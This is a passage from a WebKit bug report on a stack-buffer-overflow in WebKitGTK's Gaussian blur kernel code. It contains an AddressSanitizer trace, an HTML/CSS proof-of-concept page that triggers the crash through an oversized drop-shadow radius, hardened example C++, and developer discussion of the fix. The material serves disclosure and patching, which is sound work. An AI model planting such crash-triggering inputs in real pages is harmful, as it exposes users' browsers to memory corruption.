(WebKit::WebProcess::*)(WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters&&), std::tuple<WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters>&&)::'lambda'(auto&&...), WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters>(WebKit::WebProcess&&, WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>&&, WebKit::WebPageCreationParameters&&) /usr/bin/../lib/gcc/x86_64-linux-gnu/11/../../../../include/c++/11/bits/invoke.h:96:14 #20 0x7f4c07912bd1 in decltype(auto) std::__apply_impl<void IPC::callMemberFunction<WebKit::WebProcess, WebKit::WebProcess, void (WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters&&), std::tuple<WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters> >(WebKit::WebProcess*, void (WebKit::WebProcess::*)(WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters&&), std::tuple<WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters>&&)::'lambda'(auto&&...), std::tuple<WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters>, 0ul, 1ul>(WebKit::WebProcess&&, WebKit::WebProcess&&, std::integer_sequence<unsigned long, 0ul, 1ul>) /usr/bin/../lib/gcc/x86_64-linux-gnu/11/../../../../include/c++/11/tuple:1854:14 #21 0x7f4c07912bd1 in decltype(auto) std::apply<void IPC::callMemberFunction<WebKit::WebProcess, WebKit::WebProcess, void 
(WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters&&), std::tuple<WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters> >(WebKit::WebProcess*, void (WebKit::WebProcess::*)(WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters&&), std::tuple<WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters>&&)::'lambda'(auto&&...), std::tuple<WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters> >(WebKit::WebProcess&&, WebKit::WebProcess&&) /usr/bin/../lib/gcc/x86_64-linux-gnu/11/../../../../include/c++/11/tuple:1865:14 #22 0x7f4c07912bd1 in void IPC::callMemberFunction<WebKit::WebProcess, WebKit::WebProcess, void (WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters&&), std::tuple<WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters> >(WebKit::WebProcess*, void (WebKit::WebProcess::*)(WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters&&), std::tuple<WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters>&&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebKit/Platform/IPC/HandleMessage.h:134:5 #23 0x7f4c07912bd1 in void IPC::handleMessage<Messages::WebProcess::CreateWebPage, WebKit::WebProcess, WebKit::WebProcess, void (WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, 
WebKit::WebPageCreationParameters&&)>(IPC::Connection&, IPC::Decoder&, WebKit::WebProcess*, void (WebKit::WebProcess::*)(WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters&&)) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebKit/Platform/IPC/HandleMessage.h:236:9
    #24 0x7f4c07912bd1 in WebKit::WebProcess::didReceiveWebProcessMessage(IPC::Connection&, IPC::Decoder&) /home/fuzz/Downloads/webkitgtk-2.41.92/build/DerivedSources/WebKit/WebProcessMessageReceiver.cpp:122:16
    #25 0x7f4c08c93deb in WebKit::WebProcess::didReceiveMessage(IPC::Connection&, IPC::Decoder&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebKit/WebProcess/WebProcess.cpp:932:9
    #26 0x7f4c0831fee0 in IPC::Connection::dispatchMessage(IPC::Decoder&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebKit/Platform/IPC/Connection.cpp:1233:15
    #27 0x7f4c083204a5 in IPC::Connection::dispatchMessage(std::unique_ptr<IPC::Decoder, std::default_delete<IPC::Decoder> >) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebKit/Platform/IPC/Connection.cpp:1281:9
    #28 0x7f4c08320cb6 in IPC::Connection::dispatchOneIncomingMessage() /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebKit/Platform/IPC/Connection.cpp:1346:5
    #29 0x7f4c0832338f in IPC::Connection::enqueueIncomingMessage(std::unique_ptr<IPC::Decoder, std::default_delete<IPC::Decoder> >)::$_15::operator()() const /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebKit/Platform/IPC/Connection.cpp:1195:28
    #30 0x7f4c0832338f in WTF::Detail::CallableWrapper<IPC::Connection::enqueueIncomingMessage(std::unique_ptr<IPC::Decoder, std::default_delete<IPC::Decoder> >)::$_15, void>::call() /home/fuzz/Downloads/webkitgtk-2.41.92/build/WTF/Headers/wtf/Function.h:53:39
    #31 0x7f4c0499d4a9 in WTF::Function<void ()>::operator()() const /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WTF/wtf/Function.h:82:35
    #32 0x7f4c0499d4a9 in WTF::RunLoop::performWork() /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WTF/wtf/RunLoop.cpp:147:9
    #33 0x7f4c04b07d98 in WTF::RunLoop::RunLoop()::$_1::operator()(void*) const /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WTF/wtf/glib/RunLoopGLib.cpp:80:42
    #34 0x7f4c04b07d98 in WTF::RunLoop::RunLoop()::$_1::__invoke(void*) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WTF/wtf/glib/RunLoopGLib.cpp:79:43
    #35 0x7f4c04b05433 in WTF::RunLoop::$_0::operator()(_GSource*, int (*)(void*), void*) const /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WTF/wtf/glib/RunLoopGLib.cpp:53:28
    #36 0x7f4c04b05433 in WTF::RunLoop::$_0::__invoke(_GSource*, int (*)(void*), void*) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WTF/wtf/glib/RunLoopGLib.cpp:45:5
    #37 0x7f4bfcb20c43 in g_main_context_dispatch (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x55c43) (BuildId: c74e800dfd5f72649d673b44292f4a817e45150b)

SUMMARY: AddressSanitizer: stack-buffer-overflow /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperGL.cpp:359:23 in WebCore::computeGaussianKernel(float, std::array<float, 6ul>&, std::array<float, 6ul>&)
Shadow bytes around the buggy address:
  0x0fe9f651cd60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0fe9f651cd70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0fe9f651cd80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0fe9f651cd90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0fe9f651cda0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0fe9f651cdb0: 00 00 00 00 f1 f1 f1 f1 00 00 00 00 00[04]f2 f2
  0x0fe9f651cdc0: f2 f2 00 f2 f2 f2 00 00 00 f2 f2 f2 f2 f2 00 00
  0x0fe9f651cdd0: 00 f2 f2 f2 f2 f2 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8
  0x0fe9f651cde0: f8 f8 f8 f8 f8 f8 f2 f2 f2 f2 f8 f8 f8 f8 f8 f8
  0x0fe9f651cdf0: f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f3 f3 f3 f3 f3 f3
  0x0fe9f651ce00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==237950==ABORTING
```

5. Proof-of-Concept

```html
<style>
.class2 { -webkit-filter: blur(0em) drop-shadow(91px 36px 1024em black); }
x48,.class0:read-only { border-style: groove outset outset hidden; }
*:nth-child(odd) { display: block table; }
style { -webkit-animation: keyframes2,keyframes3 0.5s steps(454),ease-out alternate-reverse,normal both; }
@keyframes keyframes3 { 40% { -webkit-transform: scaleX(43) } }
</style>
<a id="x56" ping="x" draggable="true" class="class2" translate="yes" itemtype="AAAAAAAA" charset="UTF-16" contextmenu="foo" slot="foo" webkitdropzone="copy" onfocus="f3()">
<image id="x21" tabindex="-1" preserveAspectRatio="xMaxYMax" buffered-rendering="dynamic" class="class0" paint-order="stroke markers" width="0px" vector-effect="non-scaling-stroke" clip="rect(auto,0px,auto,auto)" transform="rotate(180deg) translate(100%,284em)" x="16%">
```

6. Software Download Link

a. https://webkitgtk.org/
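The root cause is that `blurRadiusToKernelHalfSize` is only guarded by a debug `ASSERT`, so a drop-shadow radius large enough to make `ceilf(radius * 2 + 1)` exceed `GaussianKernelMaxHalfSize` indexes past the stack array `fullKernel`. The following is an added example (not WebKit's code and not the landed fix) showing the same computation with the range check done in floating point before the conversion and before any indexing; `GaussianKernelMaxHalfSize = 11` is inferred from the shadow bytes above (44 addressable bytes = 11 floats), `gauss()` is a stand-in, and `checkedKernelHalfSize` / `computeGaussianKernelChecked` are hypothetical names.

```cpp
#include <array>
#include <cmath>
#include <optional>

// GaussianKernelMaxHalfSize = 11 is inferred from the shadow bytes above (five
// 00 bytes plus one 04 byte = 44 addressable bytes = 11 floats); it is an
// assumption for this example, not a value taken from the WebKit sources.
constexpr unsigned GaussianKernelMaxHalfSize = 11;

// Stand-in for WebKit's gauss(i, radius): unnormalised Gaussian, radius as sigma.
static float gauss(float x, float sigma) {
    return std::exp(-(x * x) / (2 * sigma * sigma));
}

// Unchecked conversion as in the report: only an ASSERT guards the result, so
// in a release build a large radius gives an index far beyond the 11 floats.
static unsigned blurRadiusToKernelHalfSize(float radius) {
    return static_cast<unsigned>(std::ceil(radius * 2 + 1));
}

// Hardened variant: validate while still in floating point, so oversized,
// negative, infinite or NaN radii are rejected before the float-to-unsigned
// conversion (undefined for out-of-range values) and before any indexing.
static std::optional<unsigned> checkedKernelHalfSize(float radius) {
    float halfSize = std::ceil(radius * 2 + 1);
    if (!(halfSize >= 1 && halfSize <= GaussianKernelMaxHalfSize)) // also false for NaN
        return std::nullopt;
    return static_cast<unsigned>(halfSize);
}

// The report's normalisation loop, run only after the size check; returns
// false instead of writing past fullKernel so the caller can skip the blur.
static bool computeGaussianKernelChecked(float radius,
        std::array<float, GaussianKernelMaxHalfSize>& fullKernel, unsigned& kernelHalfSize) {
    auto halfSize = checkedKernelHalfSize(radius);
    if (!halfSize)
        return false;
    kernelHalfSize = *halfSize;
    fullKernel[0] = 1;
    float sum = fullKernel[0];
    for (unsigned i = 1; i < kernelHalfSize; ++i) {
        fullKernel[i] = gauss(static_cast<float>(i), radius);
        sum += 2 * fullKernel[i];
    }
    float scale = 1 / sum;
    for (unsigned i = 0; i < kernelHalfSize; ++i)
        fullKernel[i] *= scale;
    return true;
}
```

With the PoC's `1024em` shadow (on the order of 16384px at 16px/em) the checked path returns `false` rather than reaching the write ASan reports at TextureMapperGL.cpp:359.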
Attachments
PoC file (835 bytes, text/html)
2023-12-01 05:29 PST, Park Sangwoo
no flags
WIP patch (681 bytes, patch)
2023-12-03 13:09 PST, Fujii Hironori
no flags
test case 2 (125 bytes, text/html)
2023-12-03 13:41 PST, Fujii Hironori
no flags
Patch (3.37 KB, patch)
2023-12-05 20:01 PST, Fujii Hironori
no flags
Radar WebKit Bug Importer
Comment 1 2023-12-01 05:35:14 PST
Fujii Hironori
Comment 2 2023-12-03 13:06:35 PST
Thank you very much for the report!
Fujii Hironori
Comment 3 2023-12-03 13:09:43 PST
Created attachment 468845 [details] WIP patch
Fujii Hironori
Comment 4 2023-12-03 13:41:54 PST
Created attachment 468846 [details] test case 2
Fujii Hironori
Comment 5 2023-12-03 13:53:37 PST
Hi, Brent. If a security bug is assigned to webkit-unassigned@lists.webkit.org, comments are published like https://lists.webkit.org/pipermail/webkit-unassigned/2023-December/1136022.html. Could you search security bugs assigned to webkit-unassigned@lists.webkit.org?
Michael Catanzaro
Comment 6 2023-12-03 15:26:19 PST
I will request a CVE for this issue.

(In reply to Fujii Hironori from comment #5)
> Hi, Brent.
>
> If a security bug is assigned to webkit-unassigned@lists.webkit.org, comments
> are published like
> https://lists.webkit.org/pipermail/webkit-unassigned/2023-December/1136022.html

Ouch...
Carlos Garcia Campos
Comment 7 2023-12-04 00:52:38 PST
The shadow blur patches were reverted in our stable branch because they broke rendering in rpi, so this might not affect 2.42.2.
Michael Catanzaro
Comment 8 2023-12-04 06:57:15 PST
OK great. Since no stable release is affected by this bug, and requesting CVEs for unstable releases that are only used by testers is not worthwhile, we don't need a CVE after all. But the bug still needs to be fixed in main, of course. (Good find; thanks for reporting this issue.) I had wondered why these patches had been reverted. If they broke rendering on Raspberry Pi and it's still broken in main, maybe we should revert them there too? Are we really comfortable with Raspberry Pi being broken?
Fujii Hironori
Comment 9 2023-12-04 11:53:23 PST
bug#261870 is tracking the rpi issue.
Fujii Hironori
Comment 10 2023-12-05 20:01:11 PST
Fujii Hironori
Comment 11 2023-12-05 20:55:40 PST
Invoking 'webkit-patch upload' complains.

> The patch you are uploading references https://bugs.webkit.org/show_bug.cgi?id=265659
> https://bugs.webkit.org/show_bug.cgi?id=265659 matches 'project:Security' and is thus redacted
> Please use 'git-webkit' to upload this fix. 'webkit-patch' does not support security changes

Should I really use git-webkit for a security bug?
Fujii Hironori
Comment 12 2023-12-06 05:04:03 PST
Comment on attachment 468907 [details] Patch EWS doesn't process this patch. I have to create a GitHub pull request.
Michael Catanzaro
Comment 13 2023-12-06 06:07:08 PST
(In reply to Fujii Hironori from comment #11)
> Should I really use git-webkit for a security bug?

Just make sure it creates the pull request in the security repo and not the public repo.
Jonathan Bedard
Comment 14 2023-12-06 14:03:45 PST
Jonathan Bedard
Comment 15 2023-12-06 14:06:31 PST
I reached out to Fujii, he isn't part of the security group yet, so I've posted the PR for him to get it reviewed. As Michael points out, this hasn't shipped yet, so the PR is made against `main` in WebKit/WebKit-security, we'll land in public once the change is reviewed and clears EWS.
Michael Catanzaro
Comment 16 2023-12-14 05:40:20 PST
So in the pull request I requested the addition of a RELEASE_ASSERT() to make sure the buffer index is in range. I also approved the pull request. But finally I remembered that Fujii doesn't have access to the security repo yet and could not see any of my review feedback. I don't think we need to follow the standard security process for this particular bug because (a) it doesn't affect Apple products, and (b) it also doesn't affect stable releases of WPE/GTK (yet). It can't even land on our stable branches since the commit it fixes is reverted there, so the only place for the fix to land is main. Accordingly, I'm making this bug public now. Fujii, please prepare a pull request using the normal repo and we can get this landed. Thanks!
Fujii Hironori
Comment 17 2023-12-14 12:16:57 PST
EWS
Comment 18 2023-12-14 16:11:55 PST
Committed 272081@main (15dc72ca9521): <https://commits.webkit.org/272081@main> Reviewed commits have been landed. Closing PR #21821 and removing active labels.